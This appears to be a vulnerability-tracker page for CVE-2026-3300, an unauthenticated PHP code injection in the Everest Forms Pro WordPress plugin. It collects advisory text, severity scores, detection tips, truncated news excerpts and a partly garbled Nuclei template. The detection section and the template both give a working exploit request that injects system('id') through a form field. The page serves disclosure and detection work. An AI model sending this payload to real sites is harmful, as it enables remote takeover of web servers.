CVE-2026-3300
published 2026-03-31CVE-2026-3300: The Everest Forms Pro plugin for WordPress is vulnerable to Remote Code Execution via PHP Code Injection in all versions up to, and including, 1.9.12. This is…
PriorityP192critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
40.99%
98.5th percentile
The Everest Forms Pro plugin for WordPress is vulnerable to Remote Code Execution via PHP Code Injection in all versions up to, and including, 1.9.12. This is due to the Calculation Addon's process_filter() function concatenating user-submitted form field values into a PHP code string without proper escaping before passing it to eval(). The sanitize_text_field() function applied to input does not escape single quotes or other PHP code context characters. This makes it possible for unauthenticated attackers to inject and execute arbitrary PHP code on the server by submitting a crafted value in any string-type form field (text, email, URL, select, radio) when a form uses the "Complex Calculation" feature.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| wpeverest | everest_forms_pro | <= 1.9.12 | — |
Detection & IOCsextracted from sources · hover to see the quote
commandaction=everest_forms_ajax_form_submission&everest_forms[id]={{form_id}}&everest_forms[author]=1&everest_forms[form_fields][{{text_field}}]=1'%3B+system('id')%3B+echo+'&everest_forms[form_fields][{{calc_field}}]=0&{{nonce_field}}={{nonce}}↗
- →Use the Nuclei regex matcher 'uid=[0-9]+\([a-z_-]+\)\s*gid=[0-9]+\([a-z_-]+\)' in HTTP response bodies to confirm successful RCE via the system('id') probe payload. ↗
- →The trailing // comment marker in injected PHP is a key syntactic indicator; look for form field values matching the pattern: single-quote + PHP statement + // in HTTP request bodies targeting Everest Forms endpoints. ↗
- →Identify vulnerable plugin installations by detecting Everest Forms Pro versions up to and including 1.9.12 in WordPress plugin directories; version 1.9.13 contains the patch. ↗
- ·The sanitize_text_field() function used on form input does NOT escape single quotes or PHP code context characters, making it insufficient as a security control for eval() contexts. Defenders should not rely on this function alone to prevent PHP injection. ↗
- ·The vulnerability is exploitable by unauthenticated attackers on any form that uses the 'Complex Calculation' feature, meaning no login or privilege is required to trigger RCE. ↗
- ·All string-type form field types (text, email, URL, select, radio) are affected attack surfaces when the Complex Calculation addon is active, not just numeric fields. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-jfqc-5rvh-wp99: The Everest Forms Pro plugin for WordPress is vulnerable to Remote Code Execution via PHP Code Injection in all versions up to, and including, 1
ghsa_unreviewed·2026-03-31
CVE-2026-3300 [CRITICAL] CWE-94 GHSA-jfqc-5rvh-wp99: The Everest Forms Pro plugin for WordPress is vulnerable to Remote Code Execution via PHP Code Injection in all versions up to, and including, 1
The Everest Forms Pro plugin for WordPress is vulnerable to Remote Code Execution via PHP Code Injection in all versions up to, and including, 1.9.12. This is due to the Calculation Addon's process_filter() function concatenating user-submitted form field values into a PHP code string without proper escaping before passing it to eval(). The sanitize_text_field() function applied to input does not escape single quotes or other PHP code context characters. This makes it possible for unauthenticated attackers to inject and execute arbitrary PHP code on the server by submitting a crafted value in any string-type form field (text, email, URL, select, radio) when a form uses the "Complex Calculation" feature.
VulnCheck
wpeverest everest_forms Improper Control of Generation of Code ('Code Injection')
vulncheck·2026·CVSS 9.8
CVE-2026-3300 [CRITICAL] wpeverest everest_forms Improper Control of Generation of Code ('Code Injection')
wpeverest everest_forms Improper Control of Generation of Code ('Code Injection')
The Everest Forms Pro plugin for WordPress is vulnerable to Remote Code Execution via PHP Code Injection in all versions up to, and including, 1.9.12. This is due to the Calculation Addon's process_filter() function concatenating user-submitted form field values into a PHP code string without proper escaping before passing it to eval(). The sanitize_text_field() function applied to input does not escape single quotes or other PHP code context characters. This makes it possible for unauthenticated attackers to inject and execute arbitrary PHP code on the server by submitting a crafted value in any string-type form field (text, email, URL, select, radio) when a form uses the "Complex Calculation" feature.
Aff
No detection rules found.
Nuclei
Everest Forms Pro <= 1.9.12 - Unauthenticated RCE via Calculation Formula Injection
nuclei·CVSS 9.8
CVE-2026-3300 [CRITICAL] Everest Forms Pro <= 1.9.12 - Unauthenticated RCE via Calculation Formula Injection
Everest Forms Pro ]*data-field-id=(?:\\"|")(field_[A-Za-z0-9]+)'
- type: regex
name: calc_field
internal: true
group: 1
regex:
- 'evf-field-number[^>]*data-field-id=(?:\\"|")(field_[A-Za-z0-9]+)'
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=everest_forms_ajax_form_submission&everest_forms[id]={{form_id}}&everest_forms[author]=1&everest_forms[form_fields][{{text_field}}]=1'%3B+system('id')%3B+echo+'&everest_forms[form_fields][{{calc_field}}]=0&{{nonce_field}}={{nonce}}
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- 'uid=[0-9]+\([a-z_-]+\)'
- type: word
part: body
words:
- '"success":true'
extractors:
- type: regex
group: 0
regex:
- 'uid=[0-9]+\([a-z_-]+\)\s*gid=[0-9]+\([a-z_-]+\)'
# dig
Hackernews
⚡ Weekly Recap: Instagram Account Hacks, Android Zero-Day, GitHub Worm and More
blogs_hackernews·2026-06-08·CVSS 8.4
CVE-2025-48595 [HIGH] ⚡ Weekly Recap: Instagram Account Hacks, Android Zero-Day, GitHub Worm and More
Home
Threat Intelligence
Vulnerabilities
Cyber Attacks
Webinars
Expert Insights
Awards
Webinars
Awards
Free eBooks
About THN
Jobs
Advertise with us
## ⚡ Weekly Recap: Instagram Account Hacks, Android Zero-Day, GitHub Worm and More
Monday again. The weekend was meant to be quiet. It wasn't. Last week had poisoned packages, a broken AI helper, and a worm tearing through repos. The ugly part: basic tricks still worked.
A chatbot got fooled. A bot token got leaked inside the malware. The same old mistakes showed up again. And while everyone chased the loud stuff, quieter attackers sat in inboxes for months, reading mail and stealing it bit by bit.
Lots to cover. Grab coffee. Read up.
## ⚡ Threat of the Week
Miasma Worm Hits 73 Microsoft GitHub Repositories in Supply Chain
Bleepingcomputer
Critical Everest Forms Pro flaw exploited to take over WordPress sites
blogs_bleepingcomputer·2026-06-06·CVSS 9.8
CVE-2026-3300 [CRITICAL] Critical Everest Forms Pro flaw exploited to take over WordPress sites
## Critical Everest Forms Pro flaw exploited to take over WordPress sites
## Bill Toulas
Hackers are actively exploiting a critical vulnerability (CVE-2026-3300) in the Everest Forms Pro plugin, which lets them take complete control of a WordPress website.
The security issue affects versions 1.9.12 and earlier of the plugin and can be leveraged without authentication to execute arbitrary code on the server.
Everest Forms Pro is a commercial add-on for the WordPress form builder plugin Everest Forms. It is used to create contact, registration, payment, and other custom application forms.
The CVE-2026-3300 vulnerability is in the plugin’s Complex Calculation feature, which accepts values submitted through form fields and inserts them into a PHP code string. Then, it executes the resulti
Hackernews
Hackers Exploit Critical Everest Forms Pro WordPress Plugin Flaw to Take Over Sites
blogs_hackernews·2026-06-05·CVSS 9.8
CVE-2026-3300 [CRITICAL] Hackers Exploit Critical Everest Forms Pro WordPress Plugin Flaw to Take Over Sites
Home
Threat Intelligence
Vulnerabilities
Cyber Attacks
Webinars
Expert Insights
Awards
Webinars
Awards
Free eBooks
About THN
Jobs
Advertise with us
## Hackers Exploit Critical Everest Forms Pro WordPress Plugin Flaw to Take Over Sites
Threat actors are actively exploiting a critical security flaw in Everest Forms Pro, a WordPress plugin with about 4,000 active installations, to execute arbitrary code, leading to a complete site compromise.
The vulnerability in question is CVE-2026-3300 (CVSS score: 9.8), a remote code execution bug impacting all versions of the plugin up to, and including, 1.9.12. A patch for the flaw was released on March 18, 2026, with version 1.9.13.
"This is due to the Calculation Addon's process_filter() function concatenating user-submitted form fie
Wiz
CVE-2026-3300 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2026-3300 [CRITICAL] CVE-2026-3300 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-3300 :
WordPress vulnerability analysis and mitigation
The Everest Forms Pro plugin for WordPress is vulnerable to Remote Code Execution via PHP Code Injection in all versions up to, and including, 1.9.12. This is due to the Calculation Addon's process_filter() function concatenating user-submitted form field values into a PHP code string without proper escaping before passing it to eval(). The sanitize_text_field() function applied to input does not escape single quotes or other PHP code context characters. This makes it possible for unauthenticated attackers to inject and execute arbitrary PHP code on the server by submitting a crafted value in any string-type form field (text, email, URL, select, radio) when a form uses the "Complex Calculation" feature.
Source : NVD
##
2026-03-31
Published
Exploited in the wild